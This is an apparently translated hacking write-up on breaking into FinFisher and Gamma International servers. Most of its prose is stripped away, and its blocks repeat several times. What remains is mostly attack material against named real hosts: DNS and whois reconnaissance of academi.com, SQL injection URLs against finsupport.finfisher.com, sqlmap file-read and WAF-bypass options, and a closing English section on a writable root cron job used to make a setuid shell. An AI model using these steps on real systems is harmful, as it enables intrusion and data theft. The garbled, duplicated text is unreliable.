C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
(Getting root)

 ___________
< got r00t? >
 -----------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

Getting root on roughly half of all Linux servers comes down to two scripts: Linux_Exploit_Suggester, which matches the kernel version against known local exploits, and unix-privesc-check, which looks for misconfigurations.

finsupport ran Debian, and unix-privesc-check reported this almost immediately:

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus
WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

Two scripts that cron runs as root every hour, both writable by the web server's user. Two lines appended to /etc/cron.hourly/webalizer are enough:

chown root:root /path/to/my_setuid_shell
chmod 04755 /path/to/my_setuid_shell

Then wait for cron... and nothing happens. The hour passes and the shell is still not setuid. The catch was timing: cron runs on the server's clock, not yours. ls -l /etc/localtime shows which time zone the server is in, and it was six hours away from what had been assumed; when the right hour came around, webalizer ran, the setuid shell was in place, and that was root.

In general, once any foothold exists on a Linux box, these two scripts are the first thing to run; a world-writable cron job is as common as it is careless. Root on finsupport meant unrestricted access to everything on the server: the portal's files and database, and whatever had been stored there for Gamma's customers.
